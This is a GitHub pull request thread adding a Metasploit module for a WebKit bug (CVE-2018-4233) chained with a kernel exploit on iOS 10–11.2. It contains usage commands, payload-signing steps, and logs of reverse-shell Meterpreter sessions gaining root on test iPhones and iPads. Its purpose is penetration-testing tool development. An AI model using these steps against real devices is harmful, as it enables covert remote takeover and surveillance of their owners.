Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2018-4233 and async_wait for iOS 10 to 11.2 #11477

Merged
merged 26 commits into from Jun 2, 2019

Conversation

Projects
None yet
9 participants
@timwr
Copy link
Contributor

commented Feb 25, 2019

The demonstrates CVE-2018-4233 on iOS. This should work on all 64bit iOS 10 -> 11.2 devices.

The WebKit exploit looks up offsets dynamically (thanks to @JakeBlair420 and @Siguza: https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js).

TODO

  • Fix liboffsetfinder64 to support all devices (see offsets.m)
  • Add trust cache injection from @xerub

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/apple_ios/browser/webkit_createthis
  • set LHOST <LHOST>
  • set URIPATH /
  • exploit
  • Verify you get a meterpreter session

@timwr timwr added the ios label Feb 25, 2019

@timwr timwr marked this pull request as ready for review Feb 27, 2019

@Huan2gao

This comment has been minimized.

Copy link

commented Mar 8, 2019

hello, i tried this on iPhone OS 10.3.2. every thing happens fine
[*] 192.168.40.10 webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1
[+] 192.168.40.10 webkit_createthis - Sent async_wake exploit
but after this i'm not able get shell. Please help me out. Thanks

@timwr timwr force-pushed the timwr:cve_2018_4233_ios_10 branch from 9032bd0 to a404e62 Mar 8, 2019

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Mar 8, 2019

@Huan2gao I just pushed a few fixes, can you try again please? Do you see anything in the logs? Crash reports?

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Mar 8, 2019

Oops you also need to put a sha1 signed copy of mettle.dylib at metasploit-framework/data/mettle/aarch64-iphone-darwin/bin/mettle.dylib, e.g:

jtool --sign sha1 --inplace mettle.dylib
@Huan2gao

This comment has been minimized.

Copy link

commented Mar 14, 2019

thanks for helping me but now new issue raise
Mar 14 17:52:37 kutsuakirahiroshis-iPhone amfid[179] : /private/var/mobile/mettle.dylib not valid: 0xe800801c: No code signature found.
Mar 14 17:52:37 kutsuakirahiroshis-iPhone kernel(AppleMobileFileIntegrity)[0] : AMFI: code signature validation failed.

@timwr timwr force-pushed the timwr:cve_2018_4233_ios_10 branch from a404e62 to 98a2237 Mar 14, 2019

@TheBrokenWasp

This comment has been minimized.

Copy link

commented Mar 16, 2019

hello, I was just trying this out, I don't really know how it works, but I got this error:

[*] 192.168.1.5      webkit_createthis - Requesting / from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[-] 192.168.1.5      webkit_createthis - Exception handling request: No such file or directory @ rb_sysopen - D:/metasploit-framework/embedded/framework/data/exploits/CVE-2018-4243/exploit

any ideas? I'm using the windows version by the way and trying the exploit on my 10.3.1 iPad mini 2 (64 bit)... I tried finding the file it said didn't exist in the pull request branch but it's not there either :(

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Mar 16, 2019

Are you sure you're testing the right version (89f8cae)?
When I try to reproduce with curl (using your user agent) I get this:

curl -H"User-Agent:Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1" http://192.168.1.5:8080/exploit

[*] 192.168.1.5   webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5   webkit_createthis - Sent async_wake exploit
@TheBrokenWasp

This comment has been minimized.

Copy link

commented Mar 17, 2019

When (if ever) will IOS 11 support be added to this?

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Mar 17, 2019

I'll start adding it when this pull request is tested and landed. Your device is iOS 10 so it should work. Can you test again please?

@TheBrokenWasp

This comment has been minimized.

Copy link

commented Mar 17, 2019

@timwr I would if I could either 1. install the pull request on windows somehow or 2. figure out how to install ParrotOS on my usb :/

@TheBrokenWasp

This comment has been minimized.

Copy link

commented Mar 17, 2019

By the way, will you add this to browser autopwn?

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Mar 17, 2019

That's not a bad idea. I'd use BES and BAP 2.

@TheBrokenWasp

This comment has been minimized.

Copy link

commented Mar 18, 2019

I once again tried this while getting every single file that might be missing, and I got all of the requirements. Now it says a file that isn't supposed to exist is needed?

[*] Starting persistent handler(s)...
msf5 >
msf5 > use exploit/apple_ios/browser/webkit_createthis
msf5 exploit(apple_ios/browser/webkit_createthis) > set LHOST 192.168.1.9
LHOST => 192.168.1.9
msf5 exploit(apple_ios/browser/webkit_createthis) > set URIPATH /
URIPATH => /
msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/webkit_createthis) >
[*] Started reverse TCP handler on 192.168.1.9:4444
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.9:8080/
[*] Server started.
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5      webkit_createthis - Sent async_wake exploit
[*] 192.168.1.5      webkit_createthis - Requesting / from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5      webkit_createthis - Sent async_wake exploit
[*] 192.168.1.5      webkit_createthis - Requesting / from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5      webkit_createthis - Sent async_wake exploit
[-] 192.168.1.5      webkit_createthis - Exception handling request: No such file or directory @ rb_sysopen - D:/metasploit-framework/embedded/framework/data/mettle/aarch64-iphone-darwin/bin/mettle.dylib
@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Mar 20, 2019

@TheBrokenWasp apologies, I've pushed the missing file (it's a sha1 signed mettle.dylib).
I'll try find a way of signing it as part of the mettle build (or dynamically within the framework).

@TheBrokenWasp

This comment has been minimized.

Copy link

commented Mar 21, 2019

So I got a session, but it doesn't work :/

msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5
 exploit(apple_ios/browser/webkit_createthis[*])  Started reverse TCP handler on 192.168.1.9:4444
>                                                   [*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.9:8080/
[*] Server started.
[*] 192.168.1.5      webkit_createthis - Requesting / from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[*] 192.168.1.5      webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
[+] 192.168.1.5      webkit_createthis - Sent async_wake exploit
[+] 192.168.1.5      webkit_createthis - Sent payload
[*] Meterpreter session 1 opened (192.168.1.9:4444 -> 192.168.1.5:53624) at 2019-03-21 18:17:24 -0400

msf5 exploit(apple_ios/browser/webkit_createthis) > sessions

Active sessions
===============

  Id  Name  Type                           Information                                 Connection
  --  ----  ----                           -----------                                 ----------
  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.1.5  192.168.1.9:4444 -> 192.168.1.5:53624 (192.168.1.5)

msf5 exploit(apple_ios/browser/webkit_createthis) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    chmod         Change the permissions of a file
    cp            Copy source to destination
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    arp           Display the host ARP cache
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    netstat       Display the network connections
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system's local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    shell         Drop into a system command shell
    suspend       Suspends or resumes a list of processes
    sysinfo       Gets information about the remote system, such as OS


Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    webcam_chat    Start a video chat
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play an audio file on target system, nothing written on disk

meterpreter > webcam_list
[-] Error running command webcam_list: Rex::TimeoutError Operation timed out.
meterpreter >
meterpreter > webcam_snap
[-] Error running command webcam_snap: Rex::TimeoutError Operation timed out.
meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
meterpreter >
[*] 192.168.1.5 - Meterpreter session 1 closed.  Reason: Died
@TheBrokenWasp

This comment has been minimized.

Copy link

commented Mar 21, 2019

I tried again and it worked for like 30 sec, then died again... It's not a very stable meterpreter

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Mar 22, 2019

For some reason the webcam_* commands kills the session if it's within the Safari process.

@TheBrokenWasp

This comment has been minimized.

Copy link

commented Mar 22, 2019

For some reason the webcam_* commands kills the session if it's within the Safari process.

Is there a way to migrate to a different process in ios?

@timwr timwr force-pushed the timwr:cve_2018_4233_ios_10 branch from fe8bf98 to 59d5488 Apr 3, 2019

@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Apr 3, 2019

Apologies for the delay. @TheBrokenWasp migration would be awesome but I'm not currently working on it. I think we can have some kind of persistence (until the phone reboots, but after Safari exits) without migration.

I've added support for iOS 11 (up to 11.2) but I've only got 1 device to test on. I've also added an offset cache that should speed up the initial javascript exploitation.

@timwr timwr changed the title Initial commit of CVE-2018-4233 for iOS 10 CVE-2018-4233 and async_wait for iOS 10 to 11.2 Apr 13, 2019

@Gr0minet

This comment has been minimized.

Copy link

commented Apr 15, 2019

Hello,
It works on iPhone 5s with iOS 10.2.1 👍

msf5 exploit(apple_ios/browser/webkit_createthis) > set LHOST 192.168.1.51
LHOST => 192.168.1.51
msf5 exploit(apple_ios/browser/webkit_createthis) > set URIPATH /
URIPATH => /
msf5 exploit(apple_ios/browser/webkit_createthis) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/webkit_createthis) > 
[*] Started reverse TCP handler on 192.168.1.51:4444 
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.51:8080/
[*] Server started.
[*] 192.168.1.34     webkit_createthis - Requesting / from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
[*] 192.168.1.34     webkit_createthis - Requesting /exploit from Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1
[+] 192.168.1.34     webkit_createthis - Sent async_wake exploit
[+] 192.168.1.34     webkit_createthis - Sent sha1 iOS 10 payload
[*] Meterpreter session 1 opened (192.168.1.51:4444 -> 192.168.1.34:49211) at 2019-04-15 11:34:01 +0200

msf5 exploit(apple_ios/browser/webkit_createthis) > sessions

Active sessions
===============

  Id  Name  Type                           Information                                  Connection
  --  ----  ----                           -----------                                  ----------
  1         meterpreter aarch64/apple_ios  uid=0, gid=0, euid=0, egid=0 @ 192.168.1.34  192.168.1.51:4444 -> 192.168.1.34:49211 (192.168.1.34)

msf5 exploit(apple_ios/browser/webkit_createthis) > sessions 1
[*] Starting interaction with 1...

meterpreter > pwd
/System/Library/Frameworks/WebKit.framework/XPCServices/com.apple.WebKit.WebContent.xpc
@timwr

This comment has been minimized.

Copy link
Contributor Author

commented Apr 15, 2019

Thanks for testing @Gr0minet!
would you mind adding the offsets please?
You just run the exploit after set DUMP_OFFSETS true and add it here:
https://github.com/rapid7/metasploit-framework/pull/11477/files#diff-c863bef6a4ff1e4ccdc27c413ef3f922R455

It should speed up the initial exploit.

I'll add some documentation asap and ensure the mettle repo can produce a sha256 signed dylib.

@timwr timwr force-pushed the timwr:cve_2018_4233_ios_10 branch from 542d612 to 18c825d Jun 2, 2019

@busterb busterb merged commit 18c825d into rapid7:master Jun 2, 2019

1 of 3 checks passed

Metasploit Automation - Sanity Test Execution Failed to pass tests.
Details
continuous-integration/travis-ci/pr The Travis CI build is in progress
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details

busterb added a commit that referenced this pull request Jun 2, 2019

@busterb

This comment has been minimized.

Copy link
Member

commented Jun 2, 2019

Release Notes

An exploit module for CVE-2018-4233 on iOS is now available. It will work on all 64-bit iOS 10-11.2 devices.

jmartin-r7 added a commit that referenced this pull request Jun 2, 2019

@tdoan-r7 tdoan-r7 added the rn-modules label Jun 11, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.